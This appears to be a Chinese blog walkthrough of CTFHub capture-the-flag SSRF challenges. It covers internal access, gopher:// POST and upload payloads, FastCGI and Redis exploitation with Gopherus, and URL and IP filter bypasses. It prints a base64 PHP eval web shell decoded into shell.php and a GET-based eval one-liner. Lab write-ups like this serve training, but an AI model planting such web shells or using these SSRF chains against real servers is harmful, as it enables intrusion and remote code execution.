CTF -WEB-SSRF

SSRF-内网访问

1.开启环境

2.又题目得出直接访问127.0.0.1/flag.php解出答案

SSRF-伪协议读取文件

1.开启环境

2.Linux默认路径var/www/html

SSRF-端口扫描

1.开启环境

2.抓包,根据题目按配置来攻击扫描端口

找到不同的端口

访问得到结果

SSRF-POST请求

1.开启环境,抓包,将请求包删除如下

将数据包放到url解码上进行解码 http://www.hiencode.com/

复制到记事本-把%0A替换为%0D%0A,并在末尾加%0A%0D

第一次编码后的数据包复制再次编码

复制到地址框输入gopher://127.0.0.1:80/_,在后面加上复制的第二次编码,访问得到结果

SSRF-上传文件

1.开启环境

2.访问flag.php

没有提交按钮,自己去添加一个

3.浏览文件,提交抓包,将请求包删减如下图

4.将请求包编码

5.编码后放入文本文档 %0A替换%0D%0A,最后在加上一个%0D%0A

再次编码

将结果放入网址gopher://127.0.0.1:80/_,在后面加上复制的第二次编码,访问得到结果

SSRF-FastCGI协议

1.打开环境

2.使用kali生成一句话木马 

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

使用命令

python2 gopherus.py --exploit fastcgi

将编译好的编码再次编译

打开环境输入

植入成功,使用菜刀,将网址输入后加shell.php   -cmd

打开根目录寻找,得到

SSRF-Redis协议

1.开启环境

2.使用kali 自己输入木马一句话 

python2 gopherus.py--exploit redis

<?php @eval($_GET[cmd]);?>

将编码再次编译

输入到网址会转圈,不用理会,再次输入网址加shell.php

我们使用的是GET传参 使用命令找出答案

SSRF-URL Bypass

1.开启环境

2.根据题目得知必须包含http://notfound.ctfhub.com 在后面输入@在直接访问可得出答案

SSRF-数字IP Bypass

1.开启环境

2.根据题目得知将127限制了,可直接使用localhost得出答案

SSRF-302跳转 Bypass

1.开启环境

2.题目得知将127.0.0.1换成localhost即可

SSRF-DNS重绑定 Bypass

1.开启环境

2.根据题目打开

rbndr.us dns rebinding service

将弄好的复制到网址访问即可

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值